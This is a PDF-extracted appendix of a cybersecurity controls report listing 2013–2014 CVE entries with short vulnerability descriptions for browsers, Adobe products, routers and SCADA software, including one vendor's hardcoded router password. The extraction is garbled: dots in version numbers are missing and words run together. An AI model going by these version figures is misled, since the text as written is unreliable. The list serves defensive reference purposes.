CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
